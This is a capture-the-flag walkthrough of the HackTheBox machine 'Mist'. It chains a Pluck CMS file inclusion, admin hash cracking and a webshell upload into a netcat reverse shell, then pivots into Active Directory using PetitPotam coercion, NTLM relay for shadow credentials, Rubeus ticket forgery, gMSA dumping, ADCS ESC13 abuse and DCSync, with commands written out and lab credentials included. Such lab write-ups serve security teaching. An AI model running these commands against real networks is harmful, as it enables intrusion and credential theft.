# HackTheBox - Mist ```bash Nmap scan report for 10.10.11.17 Host is up (0.30s latency). Not shown: 65534 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1) |_http-generator: pluck 4.7.18 | http-robots.txt: 2 disallowed entries |_/data/ /docs/ | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1 | http-title: Mist - Mist |_Requested resource was http://10.10.11.17/?file=mist | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set ``` From the scan we have only port 80 open, visiting the webserver we have Pluck hosted

On trying to login we'll see the version from this page

This version is vulnerable to authenticated remote code execution but currently we don't know what's the password for admin user

Trying the default ones like password and admin didn't worked, fuzzing for files, there's `cgi-bin` directory which can reveal something here

So fuzzing again at this directory for any pl files, we can find `printenv.pl`

This file lists some configuration for XAMPP, showing a username as well, `svc_web`

Checking the github issues for Pluck CMS, there seems to be Local File Inclusion on `/data/modules/albums/albums_getimage.php?image=`

On trying to read `/etc/passwd` it was detecting `../`

We can however view the albums on pluck cms as shown in the poc for LFI from where we can list contents of albums directory revealing `admin_backup.php`

This can be read through LFI

And this hash can be cracked with hashcat using mode 1700 which is for SHA-512 ```bash hashcat -a 0 -m 1700 ./admin_hash.txt /usr/share/wordlists/rockyou.txt --force ```

With this password we can login as admin on pluck

Now we can use the previous RCE exploit by uploading a module by zipping a php file having GET parameter being passed into `system` function for executing commands ```bash ```

But this file will be deleted within 1-2 minutes so there's probably a cleanup script, for getting a shell, upload and execute netcat to get a reverse shell as `svc_web`

Again as soon as the php file gets removed our shell will die

So what we can do here is to upload a php file where the cleanup script isn't deleting the files from, checking the permissions of `C:\xampp`, we have write access on this directory, so we can upload a php file there and then get a shell

```bash ```

Checking the privileges of this local user, it doesn't seem to have any privilege which can lead to local admin

Running `arp -a` to see the hosts on the network we get one IP `192.168.100.100` which seems it's the IP of domain controller

For accessing this host from our kali machine we need to perform pivoting from MS01 using `ligolo-ng` ```bash sudo ip link set ligolo up sudo ip route add 192.168.100.0/24 dev ligolo ```

We can confirm the reachability of DC01 by pinging or running nxc to check smb

Here I tried checking guest account for brute forcing SIDs to get a list of domain users but that account was disabled

Also tried checking for AS-REP roasting on the two domain accounts we can see on MS01 but it also failed

Enumerating shares with null authentication didn't yield any stuff as well

Moving back to MS01 and enumerating the system by uploading winpeas in `C:/xampp/htdocs/` as it is excluded by defender

`Brandon.keywarp` is logged in onto this system so there might be some tasks or file being checked by this user, there's also `Common Applications` directory which is writeable by local users

This directory contains few lnk files

Transferring any one of the lnk files on our windows machine to edit the location of the shortcut

Now editing this lnk file to execute nc from `C:\xampp\htdocs`to get a shell

From here we can run bloodhound to enumerate the domain

Brandon didn't had any ACLs and wasn't in any special group

It's the same with Sharon

But there's Operatives group which has ReadGMSAPasswowrd on `SVC_CA$` account

And this group has these two group members who can also PSRemote on DC01

Since smb signing is enabled on DC01, we need to relay using HTTP authentication which can be done only if WebClient service is enabled which is currently disabled, this can be checked using `GetWebDAVStatus` https://github.com/G0ldenGunSec/GetWebDAVStatus

For enabling webclient service, start responder then try mapping the share to kali machine with http protocol

Since we have a shell as brandon, we can verify if ADCS is installed on DC using certutil

Using `certify` we can list down the templates which are enabled, if `User` template is enabled we can then request a certificate and get the NTHash of brandon

```bash Certify.exe request /ca:DC01.mist.htb\mist-DC01-CA /template:User /domain:mist.htb ```

Converting the pem into pfx file in order to use it for authenticating from certipy to retrieve NTLM hash of brandon ```bash openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx ```

```bash certipy auth -pfx cert.pfx -dc-ip 192.168.100.100 -username Brandon.Keywarp -domain mist.htb ```

Now that have brandon's hash, we can use PetitPotam to cause coercion for MS01 with webdav protocol which is going to perform HTTP authentication leading to shadow credentials on MS01 but before that let's verify if we can coerce the authentication on smb, for this we need to start chisel with socks proxy ```bash .\chisel.exe client 10.10.16.43:9000 R:socks chisel server --reverse -p 9000 ```

For HTTP coercion, webclient service will be enabled on port 8080, so we need to redirect that port from MS01 to our kali machine this is known as port bending, for this I'll be using StreamDivert for redirecting outbound traffic on port 8080 to my kali machine on port 80 ```bash tcp > 8080 0.0.0.0 -> 10.10.16.43 80 ```

Running PetitPotam again, this time setting the listener to be MS01 ``` proxychains python3 /opt/PetitPotam/PetitPotam.py -u brandon.keywarp -hashes ':hash' MS01@8080/test 192.168.100.101 ```

This machine account hash can now be relayed to DC01 on ldaps to perform shadow credentials using ntlmrealyx (make sure turn HTTP Off from respnder.conf), normally machine accounts can edit their own `msDS-KeyCredentialLink` attribute but to my surprise this did not worked as it showed it's missing some rights here

This probably because the value is already set and for some reason we cannot overwrite this property the value is cleared, there's another variation of ntlmrelayx which supports both clearing and setting the value of msDS-KeyCredentialLink using an interactive ldap shell, so realying it again but this time using this version https://github.com/fortra/impacket/pull/1402

We now have the certificate and the password, using gettgtpkinit from PKINITools we can retrieve MS01 aeskey and TGT

NTHash can be recovered as well either by certipy auth or using Rubeus ```bash Rubeus.exe asktgt /user:MS01$ /domain:mist.htb /certificate:./orGRT9Km.pfx /password:aCSx4xhH2ZqvYxSAseyK /getcredentials /nowrap ```

Impersonating as local admin on MS01 using HOST service ```bash Rubeus.exe s4u /self /user:MS01$ /rc4:4A74FC05400345D580CF58AEC3E6D833 /altservice:host/ms01.mist.htb /impersonateuser:administrator /ptt /nowrap ```

Converting this kirbi (base64) ticket into ccache which is supported by impacket

And using `wmiexec.py` to get an interactive shell as admin

## Using ticketer.py This can also be done purely through linux ```bash proxychains ticketer.py -domain-sid S-1-5-21-1045809509-3006658589-2426055941 -domain mist.htb -spn HOST/MS01.mist.htb -nthash 4A74FC05400345D580CF58AEC3E6D833 -user-id 500 Administrator ```

From bloodhound we saw OP_Sharon is member of Operatives group who has ReadGMSA permission on SVC_CA$ and has PSRemote on DC, so Sharon on MS01 might be interesting, checking the Documents directory we have sharon.kdbx file which is a keepass database file that contains passwords

Reading this file will require a password

From Pictures directory, we have two image files

The second image shows us a password

The text `UA7cpa[#1!_*ZX` doesn't represent the base64 encoded value in the image

So we might be missing some characters that we need to recover, creating a wordlist with `crunch` to brute forcing the last character

Having the master password we can access the keepass file and get the password for sharon

For moving forward I pivoted using ligolo-ng as proxychains is a bit slow in reaching to MS01 internal ports and DC01, by creating ligolo interface device and adding 192.168.100.0/24 route

Spraying this password on both sharon and op_sharon

Since op_sharon has PSRemote on DC, we can login through winrm

For reading GMSA password, we can use AD module but I'll be using gMSADumper python script https://github.com/micahvandeusen/gMSADumper ``` python3 /opt/gMSADumper/gMSADumper.py -u 'OP_SHARON.MULLARD' -p 'pass' -d mist.htb -l 192.168.100.100 ```

Now with this account we can get access to SVC_CABackup user by having AddKeyCredentialLink access control, which basically is again performing shadow credentials attack through pyWhisker ```bash python3 pywhisker.py -u 'svc_ca$' -H 'hash' -t SVC_CABACKUP -a add -d mist.htb --dc-ip 192.168.100.100 ```

To retrieve the NThash, using the same steps which were performed for MS01$ ```bash Rubeus.exe asktgt /user:SVC_CABACKUP /domain:mist.htb /certificate:./SW9Iavcw.pfx /password:ciCdAJ1qPObnqR57ltDL /getcredentials /nowrap ```

Recently two new ADCS attacks were introduced dubbed as ESC13 & ESC14, from certipy's github issues we can see support for ESC13 being added as well

So cloning this version of certipy https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53, we can find a certificate template `ManagerAuthentication` being vulnerable to ESC13

This template has an Extended Key Usage (EKU) for Client Authentication which means that through this certificate we can perform authentication, this certificate is linked with `Certificate Managers` group and members of certificate services can enroll for this certificate

explain abuse Requesting the certificate with ManagerAuthentication template, this is going to show an error for public key not meeting the minimum size

By default certipy uses 2048 as the length of public key, this can be changed to 4096 with `-key-size` parameter ```bash certipy req -u 'SVC_CABACKUP' -hashes 'hash' -ca 'mist-DC01-CA' -dc-ip 192.168.100.100 -template 'ManagerAuthentication' -key-size 4096 ```

We have the certificate for svc_backup but this holds the permissions of certificate managers, so requesting a TGT with this certificate ``` python3 gettgtpkinit.py -cert-pfx ./svc_cabackup.pfx -dc-ip 192.168.100.100 mist.htb/SVC_CABACKUP SVC_CABACKUP.ccache ```

Listing the templates again, we can see `BackupSvcAuthentication` can be enrolled with CA Backup members which we are with the current certificate that we have

On requesting this certificate we can again privileges of `ServiceAccounts` group which is a member of `Backup Operators` group

Being in this group we can backup the registry hives to dump SAM hashes of DC account and then perform DCSync ```bash certipy req -u 'SVC_CABACKUP@mist.htb' -k -no-pass -ca 'mist-DC01-CA' -dc-ip 192.168.100.100 -target DC01.mist.htb -template 'BackupSvcAuthentication' -key-size 4096 ```

Exporting this TGT and starting smb server through smbserver.py to backup the SAM, SYSTEM and SECURITY from the registry hive using `reg.py`

(For dumping SYSTEM file, it will take some time), after having these 3 files running secretsdump.py locally and using the `$MACHINE.ACC` hash to performing dcsync

# References - https://www.exploit-db.com/exploits/51592 - https://github.com/pluck-cms/pluck/issues/122 - https://github.com/G0ldenGunSec/GetWebDAVStatus - https://github.com/jellever/StreamDivert - https://github.com/fortra/impacket/pull/1402 - https://github.com/micahvandeusen/gMSADumper - https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53